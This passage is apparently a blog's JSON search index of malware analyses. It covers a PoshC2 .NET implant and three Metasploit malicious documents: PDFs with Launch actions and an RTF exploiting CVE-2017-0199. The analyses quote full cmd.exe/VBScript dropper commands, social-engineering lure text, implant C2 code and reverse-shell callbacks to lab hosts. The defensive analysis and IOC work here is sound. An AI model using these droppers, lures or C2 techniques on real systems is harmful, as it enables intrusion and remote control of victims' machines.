Chrome/80.0.3987.122 Safari/537.36 6 (base64 decoded from TW96aWxsYS81LjAg...) 
7KillDate 2999-01-01 8ImplantId 1 9StageUrl https://192.168.248.128 10BeaconCommsUrl https://192.168.248.128 11URI /vfe01s/1/vsopts.js/?c 12BeaconSleep 5s 13Jitter 0.2 (20%) 14Key Qqz6czYCfkrmlba4dF16YLO1vJq13piIlFlN+5o06/g= KillDate: 2999-01-01 — effectively disabled, implant runs indefinitely BeaconSleep: 5s with Jitter: 0.2 — beacon interval is 5 seconds ±20%, confirms ~40s gap observed in sandbox was due to fake.net retry backoff, not the configured sleep UserAgent field matches exactly the User-Agent observed in HTTP request during sandbox analysis Key — AES session key used for encrypting beacon communications (separate from config decryption key) StageUrl and BeaconCommsUrl both point to 192.168.248.128 — single C2 server for both staging and ongoing communication URI: /vfe01s/1/vsopts.js/?c — confirms the exact path observed in sandbox network capture Init() → Stage() → CommandLoop() analysis # Init() — main execution entry point, called after config decryption and validation checks pass. It calls Stage() for initial C2 check-in, then enters CommandLoop() indefinitely\n1private static void Init(Config config) 2{ 3 IComms comms = new HttpComms(config); 4 Program._sendData = new Action\u0026lt;string, byte[]\u0026gt;(comms.SendTaskOutputBytes); 5 Program.Stage(config, comms); 6 Program.CommandLoop(config, comms); 7} CommandLoop() — main beacon loop, runs until KillDate.\n1while (!(DateTime.ParseExact(config.KillDate, \u0026#34;yyyy-MM-dd\u0026#34;, ...) 
\u0026lt; DateTime.Now)) - loop continues as long as current date is before KillDate\n- KillDate: 2999-01-01 extracted from config — implant runs indefinitely\ntask parsing:\n1string text2 = text.Substring(0, 5); // first 5 chars = task ID 2string command = text.Substring(5); // remainder = command string - every command received from C2 is prefixed with a 5-character task ID\n- task ID is used when sending output back to C2 to correlate responses\nbatch command support:\n1commands.Replace(\u0026#34;multicmd\u0026#34;, \u0026#34;\u0026#34;).Split(new string[]{\u0026#34;!d-3dion@LD!-d\u0026#34;}, ...) - multicmd prefix signals multiple commands in a single response - !d-3dion@LD!-d is the hardcoded delimiter separating individual commands - both strings were identified during static strings analysis\ncommand dispatcher:\n1exit -\u0026gt; dispose comms, terminate loop 2run-temp-appdomain -\u0026gt; execute assembly in isolated temporary AppDomain 3update-config -\u0026gt; live reconfiguration via config.Refresh() 4load-module -\u0026gt; load Stage2-Core assembly into memory, wire delegates 5run-dll/exe-background -\u0026gt; execute assembly in background thread 6run-dll/exe -\u0026gt; execute assembly in current thread 7run-assembly-background -\u0026gt; run ephemeral assembly in background thread 8run-assembly -\u0026gt; run ephemeral assembly in current thread 9set-delegates -\u0026gt; rewire Stage2-Core function pointers 10download-file -\u0026gt; execute via RunCoreAssembly, send output to C2 11beacon -\u0026gt; update sleep interval via SLEEP_REGEX parser 12\u0026lt;unknown command\u0026gt; -\u0026gt; fallback: passed to RunCoreAssembly (all custom modules) C2 communication layer # Constructor initializes the steganography module ImageDataObfuscator for hiding C2 data inside image payloads, and disables SSL validation via AllowUntrustedCertificates() to allow self-signed certificates on the C2 server.\n1internal HttpComms(Config config) 2{ 3 this._config = 
config; 4 this._imageDataObfuscator = new HttpComms.ImageDataObfuscator(config); 5 Utils.AllowUntrustedCertificates(); 6} Stage() — initial C2 check-in. Environmental fingerprint is AES-encrypted and sent as SessionID cookie, confirmed by sandbox HTTP capture. C2 URL is constructed from StageCommsChannels key + StageUrl from decrypted config.\n1string cookie = Encryption.Encrypt(this._config.Key, environmentalInfo, false); 2string address = text + this._config.StageUrl; 3WebClient webClient = this.GetWebClient(cookie, hostHeader); 4string base64EncodedCiphertext = webClient.DownloadString(address); Steganographic payload padding # PadWithImageData() disguises outbound C2 data by prepending a real image followed by random noise, making the payload appear as a legitimate image file to network inspection tools.\n1internal byte[] PadWithImageData(byte[] data) 2{ 3 int num = data.Length + 1500; 4 string s = this._config.Images[new Random().Next(0, this._config.Images.Count)]; 5 byte[] array = Convert.FromBase64String(s); 6 byte[] bytes = Encoding.UTF8.GetBytes(HttpComms.ImageDataObfuscator.RandomString(1500 - array.Length)); 7 byte[] array2 = new byte[num]; 8 Array.Copy(array, 0, array2, 0, array.Length); 9 Array.Copy(bytes, 0, array2, array.Length, bytes.Length); 10 Array.Copy(data, 0, array2, array.Length + bytes.Length, data.Length); 11 return array2; 12} Final payload structure is [image bytes] + [random noise] + [actual data], total size is always data.Length + 1500 bytes. Image is randomly selected from the Images list in decrypted config and base64-decoded. 
Noise fills the remaining space up to the 1500-byte header using RandomString().\nRandomString() generates noise by sampling random characters from a fixed charset, producing unpredictable but low-entropy padding.\n1private static string RandomString(int length) 2{ 3 return new string((from s in Enumerable.Repeat\u0026lt;string\u0026gt;(\u0026#34;...................@..........................Tyscf\u0026#34;, length) 4 select s[Program.RANDOM.Next(s.Length)]).ToArray\u0026lt;char\u0026gt;()); 5} The fixed charset \u0026quot;...................@..........................Tyscf\u0026quot; was visible as a raw string in the strings analysis at offset 0x04B25D81.\n","date":"November 23, 2025","externalUrl":null,"permalink":"/investigations/dropper-cs.exe-analysis/","section":"","summary":"C2 .NET implant. AES-encrypted config, HTTPS beacon to 192.168.248.128, fileless in-memory execution, anti-debug via divide-by-zero.","title":"PoshC2: Dropper-cs.exe","type":"investigations"},{"content":" TL;DR # A malicious PDF contains no JavaScript or embedded file objects — instead, a Launch action executes cmd.exe with an inline VBScript command that reads hex-encoded bytes directly from the PDF body, decodes them into a PE32 executable, and runs it. 
The payload establishes a Metasploit reverse shell to 192.168.248.129:4444.\nInitial Analysis # 1$ file * 2evil.pdf: PDF document, version 1.5 Static Analysis # pdfid showed no JavaScript but confirmed /OpenAction and /Launch:\n1$ pdfid evil.pdf 2PDFiD 0.2.10 evil.pdf 3 /JS 0 4 /JavaScript 0 5 /OpenAction 1(1) 6 /Launch 1(1) 7 /EmbeddedFile 0 Unlike the previous sample, there is no JavaScript and no embedded file object — the payload is hidden in plain sight inside the PDF body itself.\npdf-parser revealed the Launch action in obj 5:\n1$ pdf-parser evil.pdf 2obj 5 0 3 Type: /Action 4 /S /Launch 5 /F (cmd.exe) 6 /P (/C echo Set o=CreateObject^(\u0026#34;Scripting.FileSystemObject\u0026#34;^): 7 Set f=o.OpenTextFile^(\u0026#34;evil.pdf\u0026#34;,1,True^): 8 f.SkipLine: 9 Set w=CreateObject^(\u0026#34;WScript.Shell\u0026#34;^): 10 Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\u0026#34;%TEMP%\u0026#34;^)+\u0026#34;\\\\msf.exe\u0026#34;,2,True^): 11 a=Split^(Trim^(Replace^(f.ReadLine,\u0026#34;\\\\x\u0026#34;,\u0026#34; \u0026#34;^)^)^): 12 for each x in a:g.Write^(Chr^(\u0026#34;\u0026amp;h\u0026#34; ^\u0026amp; x^)^):next: 13 g.Close:f.Close \u0026gt; 1.vbs \u0026amp;\u0026amp; cscript //B 1.vbs \u0026amp;\u0026amp; 14 start %TEMP%\\\\msf.exe \u0026amp;\u0026amp; del /F 1.vbs) The command does the following:\nWrites an inline VBScript to 1.vbs The VBScript opens evil.pdf itself, skips the first line (PDF header), and reads the second line which contains hex-encoded bytes in \\xNN format Decodes each hex byte using Chr(\u0026quot;\u0026amp;h\u0026quot; \u0026amp; x) and writes the result to %TEMP%\\msf.exe Executes msf.exe and deletes 1.vbs The social engineering message \u0026quot;To view the encrypted content please tick the Do not show this message again box and press Open\u0026quot; is appended to trick the user into clicking Open, which triggers the Launch action.\nInspecting the PDF body confirmed the hex-encoded payload on the second line:\n1$ cat evil.pdf 
2%PDF-1.5 3\\x4d\\x5a\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00... \\x4d\\x5a = MZ — PE32 magic bytes, confirming an executable is embedded directly in the PDF body.\nThe payload was extracted with:\n1$ grep -oP \u0026#39;\\\\x\\K[0-9a-fA-F]{2}\u0026#39; evil.pdf | xxd -r -p \u0026gt; mw.bin 2 3$ file mw.bin 4mw.bin: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 5 sections Dynamic Analysis # The extracted PE was executed in a sandbox. It established a connection to 192.168.248.129 over port 4444 — a default Metasploit reverse shell port.\nIOCs # Files\n- evil.pdf — malicious PDF, payload carrier\n- %TEMP%\\msf.exe — decoded PE32 reverse shell\n- 1.vbs — temporary VBScript dropper (self-deleted)\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 4444/tcp\n","date":"November 22, 2025","externalUrl":null,"permalink":"/investigations/metasploit-adobe_pdf_embedded_exe_nojs/","section":"","summary":"A malicious PDF uses a Launch action to execute cmd.exe, which runs an inline VBScript that reads hex-encoded shellcode directly from the PDF body, writes it to disk as an executable, and launches a Metasploit reverse shell.","title":"Metasploit: adobe_pdf_embedded_exe_nojs","type":"investigations"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/pdf-parser/","section":"Tags","summary":"","title":"Pdf-Parser","type":"tags"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/pdfid/","section":"Tags","summary":"","title":"Pdfid","type":"tags"},{"content":"","date":"November 22, 2025","externalUrl":null,"permalink":"/tags/vbscript/","section":"Tags","summary":"","title":"VBScript","type":"tags"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/cve-2017-0199/","section":"Tags","summary":"","title":"CVE-2017-0199","type":"tags"},{"content":" TL;DR # A malicious PDF uses two chained actions: an OpenAction triggers JavaScript that exports an 
embedded template.pdf object to disk, while a Launch action executes cmd.exe to run it. The exported file is not a PDF but a PE32 executable that establishes a reverse shell to 192.168.248.129:4444.\nInitial Analysis # 1$ file * 2evil.pdf: PDF document, version 1.0, 1 page(s) pdfid revealed several suspicious indicators:\n1$ pdfid evil.pdf 2PDFiD 0.2.10 evil.pdf 3 /JS 1 4 /JavaScript 1 5 /AA 1 6 /OpenAction 1 7 /Launch 1 The presence of /JavaScript, /OpenAction, and /Launch together is a strong indicator of a malicious document — the PDF will automatically execute code upon opening.\npdf-parser was used to examine each object in detail. The key objects are:\nobj 9 — OpenAction that fires JavaScript on open:\n1/S /JavaScript 2/JS (this.exportDataObject({ cName: \u0026#34;template\u0026#34;, nLaunch: 0 });) This silently exports the embedded template.pdf object to disk without launching it.\nobj 10 — Launch action that executes cmd.exe:\n1/S /Launch 2/Type /Action 3/Win 4 \u0026lt;\u0026lt; 5 /F (cmd.exe) 6 /D \u0026#39;(c:\\\\\\\\windows\\\\\\\\system32)\u0026#39; 7 /P \u0026#39;(/Q /C %HOMEDRIVE%\u0026amp;cd %HOMEPATH%\u0026amp;(if exist \u0026#34;Desktop\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Desktop\u0026#34;))\u0026amp;(if exist \u0026#34;My Documents\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;My Documents\u0026#34;))\u0026amp;(if exist \u0026#34;Documents\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Documents\u0026#34;))\u0026amp;(if exist \u0026#34;Escritorio\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Escritorio\u0026#34;))\u0026amp;(if exist \u0026#34;Mis Documentos\\\\\\\\template.pdf\u0026#34; (cd \u0026#34;Mis Documentos\u0026#34;))\u0026amp;(start template.pdf)\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nTo view the encrypted content please check the \u0026#34;Do not show this message again\u0026#34; box and press Open.)\u0026#39; 8 \u0026gt;\u0026gt; The social engineering message at the end is shown in a dialog box to trick the user into clicking 
\u0026ldquo;Open\u0026rdquo;, which triggers the Launch action and executes template.pdf (the dropped PE).\nobj 8 — the embedded payload stream. Extracted with:\n1$ pdf-parser --object 8 --filter --raw evil.pdf \u0026gt; template.bin The raw stream starts with MZ — a PE32 magic bytes header:\n1b\u0026#39;MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00... A Python script was used to parse and write the binary:\n1import ast 2 3with open(\u0026#39;template.bin\u0026#39;, \u0026#39;r\u0026#39;) as f: 4 content = f.read() 5 6start = content.find(\u0026#34;b\u0026#39;\u0026#34;) + 2 7end = content.rfind(\u0026#34;\u0026#39;\u0026#34;) 8data = ast.literal_eval(\u0026#34;b\u0026#39;\u0026#34; + content[start:end] + \u0026#34;\u0026#39;\u0026#34;) 9 10with open(\u0026#39;template.exe\u0026#39;, \u0026#39;wb\u0026#39;) as f: 11 f.write(data) 1$ file template.exe 2template.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 5 sections Sandbox # The extracted PE was executed in a sandbox. 
It established a connection to 192.168.248.129 over port 4444 — a default Metasploit reverse shell port.\nIOCs # Files\n- evil.pdf — malicious PDF document\n- template.exe — embedded PE32 reverse shell payload\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 4444/tcp\n","date":"November 21, 2025","externalUrl":null,"permalink":"/investigations/metasploit-adobe-pdf-embedded-file/","section":"","summary":"A malicious PDF exploits JavaScript and Launch actions to extract and execute an embedded PE payload, establishing a reverse shell connection to an attacker-controlled server.","title":"Metasploit: adobe-pdf-embedded-file","type":"investigations"},{"content":" TL;DR # A malicious RTF document contains an embedded OLE2Link object that, upon opening, silently fetches a remote HTA file from 192.168.248.129:8080 and executes it via mshta.exe — no user interaction required beyond opening the document.\nInitial Analysis # 1msf.doc: Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025 rtfobj identified an embedded OLE object of class OLE2Link containing a URL pointing to a remote HTA file:\n1$ rtfobj msf.doc 2=============================================================================== 3File: \u0026#39;msf.doc\u0026#39; - size: 5743 bytes 4---+----------+--------------------------------------------------------------- 5id |index |OLE Object 6---+----------+--------------------------------------------------------------- 70 |000001B4h |format_id: 2 (Embedded) 8 | |class name: b\u0026#39;OLE2Link\u0026#39; 9 | |data size: 2560 10 | |MD5 = \u0026#39;053ba4dffb352244944dba6f29957f4c\u0026#39; 11 | |CLSID: 00000300-0000-0000-C000-000000000046 12 | |StdOleLink (embedded OLE object - Known Related to 13 | |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174) 14 | |Possibly an exploit for the OLE2Link vulnerability (VU#921560, 15 | |CVE-2017-0199) 16 | |URL extracted: http://192.168.248.129:8080/default.hta 
17---+----------+--------------------------------------------------------------- CVE-2017-0199 is a Microsoft Office vulnerability that allows a malicious RTF document to automatically fetch and execute a remote HTA file via mshta.exe when the document is opened — without requiring macros to be enabled or any additional user interaction.\nIOCs # Files\n- msf.doc — malicious RTF document\n- MD5: 053ba4dffb352244944dba6f29957f4c\nNetwork\n- C2 Server: 192.168.248.129\n- C2 Port: 8080/tcp\n- Payload URL: http://192.168.248.129:8080/default.hta\n","date":"November 21, 2025","externalUrl":null,"permalink":"/investigations/metasploit-office_word_hta/","section":"","summary":"A malicious RTF document exploits CVE-2017-0199 via an embedded OLE2Link object to fetch and execute a remote HTA payload from an attacker-controlled server.","title":"Metasploit: office_word_hta","type":"investigations"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/rtf/","section":"Tags","summary":"","title":"RTF","type":"tags"},{"content":"","date":"November 21, 2025","externalUrl":null,"permalink":"/tags/rtfobj/","section":"Tags","summary":"","title":"Rtfobj","type":"tags"},{"content":"","externalUrl":null,"permalink":"/categories/","section":"Categories","summary":"","title":"Categories","type":"categories"}]